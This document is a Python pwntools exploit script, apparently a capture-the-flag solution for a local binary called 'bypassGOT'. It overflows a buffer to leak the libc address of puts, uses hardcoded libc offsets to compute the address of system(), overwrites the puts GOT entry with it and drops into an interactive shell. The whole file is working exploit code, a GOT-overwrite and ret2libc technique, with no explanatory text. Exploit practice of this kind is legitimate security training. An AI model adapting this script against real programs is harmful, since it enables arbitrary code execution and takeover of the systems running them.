#!/usr/bin/python

from pwn import *


puts_got = 0x0804c018
# ./dump libc6-i386_2.32-4_amd64
offset___libc_start_main_ret = 0x1efd6
offset_system = 0x00045120
offset_dup2 = 0x000f3040
offset_puts = 0x0006f7b0
offset_read = 0x000f22d0
offset_write = 0x000f2390
offset_str_bin_sh = 0x18f924

def main():
    e = ELF('/lib/i386-linux-gnu/libc.so.6')

    offset_system = e.symbols['system']
    offset_puts = e.symbols['puts']

    log.info("system() offset: %#x" % offset_system)
    log.info("puts() offset: %#x" % offset_puts)

    p = process("./bypassGOT")
    data = p.recv()
    payload= b"/bin/sh" + b"\x00" * (24 - len("/bin/sh")) + p32(puts_got)
    #payload = b"A" * 24 + p32(puts_got)
    p.send(payload)
    data = p.recv()
    log.info("Data Captured: %s", data)

    left = data.find(b"(")
    right = data.find(b")")
    #log.info("left: %d, right: %d", left, right)
    data = data[left+1: right]
    log.info("leaked information is: %s", data)
    puts_libc = u32(data[:4])
    log.info("puts@libc: 0x%x", puts_libc)

    libc_start = puts_libc - offset_puts
    system_libc = libc_start + offset_system
    log.info("system@libc: 0x%x", system_libc)

    p.send(p32(system_libc))
    p.interactive()




if __name__ == "__main__":
    main()